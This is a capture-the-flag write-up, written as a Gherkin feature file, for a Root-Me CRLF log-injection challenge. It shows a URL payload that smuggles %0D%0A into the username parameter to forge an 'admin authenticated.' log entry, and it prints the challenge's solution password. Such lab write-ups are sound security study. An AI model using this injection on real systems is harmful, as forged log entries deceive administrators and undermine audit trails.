## Version 2.0
## language: en

Feature: Web Server-rootme
  Site:
    www.root-me.org
  Category:
    Web-server
  User:
    dianaosorio97
  Goal:
    Inject false data in the log

  Background:
  Hacker's software:
    | <Software name> | <Version>     |
    | Ubuntu          | 18.04         |
    | Chrome          | 71.0.3578.98-1|
  Machine information:
    Given I am accessing the page with the following link
    """
    https://www.root-me.org/es/Challenges/Web-Servidor/CRLF
    """
    And I see the following text
    """
    Inject false data in the journalisation log.
    """
    And I entered the challenge
    Then I can see the form with the name field and password field

  Scenario: Fail:Trying insert characteres %0D %0A in the field text
    Given I am in the challenge page
    And I try insert characteres CRLF in the fields
    And I use the following characteres
    """
    %0A%0D
    """
    Then I insert the characteres follow false data
    """
    %0A%0Dadmin
    %0A%0Dpass
    """
    Then I sent the request
    And I see the following changes in the link
    """
    http://challenge01.root-me.org/web-serveur/ch14/
    ?username=%250A%250Dadmin&password=%250A%250Dpass
    """
    Then I see that the page add characters that prevent the use of %0A%0D
    And Using this characteres doesn't work
    And I could not capture the flag

  Scenario: Success: Insert data from the log
    Given That the characteres %0A%0D doesn't insert in the text field
    Then I try insert the characteres in the url field
    Then I see that the characteres wass succesfully insert
    And I see the following data in the log
    """
    admin failed to authenticate.
    admin authenticated.
    guest failed to authenticate.
    """
    Then I insert the follow data in the url
    """
    http://challenge01.root-me.org/web-serveur/ch14/
    ?username=admin%20authenticated.%0D%0Aguest&password=admin
    """
    And I see the following message
    """
    Well done, you can validate challenge with this
    password : rFSP&G0p&5uAg1%
    """
    And I put the password
    And I solve the challenge
